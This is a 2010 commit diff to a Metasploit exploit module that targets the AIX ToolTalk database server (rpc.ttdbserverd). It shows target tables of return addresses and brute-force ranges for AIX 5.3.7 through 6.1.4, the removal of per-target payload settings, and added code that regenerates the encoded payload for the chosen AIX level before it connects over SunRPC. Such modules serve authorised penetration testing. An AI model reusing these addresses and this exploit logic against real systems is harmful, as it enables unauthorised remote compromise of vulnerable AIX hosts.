Regenerate the payload with the specified AIX level, cleanups

git-svn-id: file:///home/svn/framework3/trunk@8427 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-02-09 04:15:47 +00:00
parent e7f7ac20ea
commit 48a159006a
1 changed files with 22 additions and 27 deletions


@ -50,7 +50,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x20099430+4096, 'Ret' => 0x20099430+4096,
'Addr1' => 0x2ff1ff50-8192, 'Addr1' => 0x2ff1ff50-8192,
'AIX' => '6.1.4', 'AIX' => '6.1.4',
'Payload' => { 'AIX' => '6.1.4' },
'Bruteforce' => 'Bruteforce' =>
{ {
'Start' => { 'Ret' => 0x20099430-8192 }, 'Start' => { 'Ret' => 0x20099430-8192 },
@ -67,7 +66,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x20099280+4096, 'Ret' => 0x20099280+4096,
'Addr1' => 0x2ff1ffd0-8192, 'Addr1' => 0x2ff1ffd0-8192,
'AIX' => '6.1.3', 'AIX' => '6.1.3',
'Payload' => { 'AIX' => '6.1.3' },
'Bruteforce' => 'Bruteforce' =>
{ {
'Start' => { 'Ret' => 0x20099280-8192 }, 'Start' => { 'Ret' => 0x20099280-8192 },
@ -84,7 +82,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x20099280+4096, 'Ret' => 0x20099280+4096,
'Addr1' => 0x2ff1ffd0-8192, 'Addr1' => 0x2ff1ffd0-8192,
'AIX' => '6.1.2', 'AIX' => '6.1.2',
'Payload' => { 'AIX' => '6.1.2' },
'Bruteforce' => 'Bruteforce' =>
{ {
'Start' => { 'Ret' => 0x20099280-8192 }, 'Start' => { 'Ret' => 0x20099280-8192 },
@ -101,7 +98,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x20099280+4096, 'Ret' => 0x20099280+4096,
'Addr1' => 0x2ff1ffd0-8192, 'Addr1' => 0x2ff1ffd0-8192,
'AIX' => '6.1.1', 'AIX' => '6.1.1',
'Payload' => { 'AIX' => '6.1.1' },
'Bruteforce' => 'Bruteforce' =>
{ {
'Start' => { 'Ret' => 0x20099280-8192 }, 'Start' => { 'Ret' => 0x20099280-8192 },
@ -118,7 +114,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x20099280+4096, 'Ret' => 0x20099280+4096,
'Addr1' => 0x2ff1ffd0-8192, 'Addr1' => 0x2ff1ffd0-8192,
'AIX' => '6.1.0', 'AIX' => '6.1.0',
'Payload' => { 'AIX' => '6.1.0' },
'Bruteforce' => 'Bruteforce' =>
{ {
'Start' => { 'Ret' => 0x20099280-8192 }, 'Start' => { 'Ret' => 0x20099280-8192 },
@ -135,7 +130,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x20096ba0+4096, 'Ret' => 0x20096ba0+4096,
'Addr1' => 0x2ff1ff14-8192, 'Addr1' => 0x2ff1ff14-8192,
'AIX' => '5.3.9', 'AIX' => '5.3.9',
'Payload' => { 'AIX' => '5.3.9' },
'Bruteforce' => 'Bruteforce' =>
{ {
'Start' => { 'Ret' => 0x20096ba0-8192 }, 'Start' => { 'Ret' => 0x20096ba0-8192 },
@ -152,7 +146,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x20096bf0+4096, 'Ret' => 0x20096bf0+4096,
'Addr1' => 0x2ff1ff14-8192, 'Addr1' => 0x2ff1ff14-8192,
'AIX' => '5.3.10', 'AIX' => '5.3.10',
'Payload' => { 'AIX' => '5.3.10' },
'Bruteforce' => 'Bruteforce' =>
{ {
'Start' => { 'Ret' => 0x20096bf0-8192 }, 'Start' => { 'Ret' => 0x20096bf0-8192 },
@ -169,7 +162,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x20096ba0+4096, 'Ret' => 0x20096ba0+4096,
'Addr1' => 0x2ff1ff14-8192, 'Addr1' => 0x2ff1ff14-8192,
'AIX' => '5.3.9', 'AIX' => '5.3.9',
'Payload' => { 'AIX' => '5.3.9' },
'Bruteforce' => 'Bruteforce' =>
{ {
'Start' => { 'Ret' => 0x20096ba0-8192 }, 'Start' => { 'Ret' => 0x20096ba0-8192 },
@ -186,7 +178,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x20096c10+4096, 'Ret' => 0x20096c10+4096,
'Addr1' => 0x2ff1ff98-8192, 'Addr1' => 0x2ff1ff98-8192,
'AIX' => '5.3.8', 'AIX' => '5.3.8',
'Payload' => { 'AIX' => '5.3.8' },
'Bruteforce' => 'Bruteforce' =>
{ {
'Start' => { 'Ret' => 0x20096c10-8192 }, 'Start' => { 'Ret' => 0x20096c10-8192 },
@ -203,7 +194,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x20096c10+4096, 'Ret' => 0x20096c10+4096,
'Addr1' => 0x2ff1ff98-8192, 'Addr1' => 0x2ff1ff98-8192,
'AIX' => '5.3.7', 'AIX' => '5.3.7',
'Payload' => { 'AIX' => '5.3.7' },
'Bruteforce' => 'Bruteforce' =>
{ {
'Start' => { 'Ret' => 0x20096c10-8192 }, 'Start' => { 'Ret' => 0x20096c10-8192 },
@ -220,7 +210,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0xaabbccdd, 'Ret' => 0xaabbccdd,
'Addr1' => 0xddccbbaa, 'Addr1' => 0xddccbbaa,
'AIX' => '6.1.4', 'AIX' => '6.1.4',
'Payload' => { 'AIX' => '6.1.4' },
'Bruteforce' => 'Bruteforce' =>
{ {
'Start' => { 'Ret' => 0xaabbccdd }, 'Start' => { 'Ret' => 0xaabbccdd },
@ -237,7 +226,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0xaabbccdd, 'Ret' => 0xaabbccdd,
'Addr1' => 0xddccbbaa, 'Addr1' => 0xddccbbaa,
'AIX' => '5.3.10', 'AIX' => '5.3.10',
'Payload' => { 'AIX' => '5.3.10' },
'Bruteforce' => 'Bruteforce' =>
{ {
'Start' => { 'Ret' => 0xaabbccdd }, 'Start' => { 'Ret' => 0xaabbccdd },
@ -252,9 +240,16 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def brute_exploit(brute_target) def brute_exploit(brute_target)
begin
if not @aixpayload
datastore['AIX'] = target['AIX']
@aixpayload = regenerate_payload.encoded
end
print_status("Trying to exploit rpc.ttdbserverd with address 0x%08x..." % brute_target['Ret']) print_status("Trying to exploit rpc.ttdbserverd with address 0x%08x..." % brute_target['Ret'])
begin
sunrpc_create('tcp', 100083, 1) sunrpc_create('tcp', 100083, 1)
if target['AIX'] =~ /6\./ if target['AIX'] =~ /6\./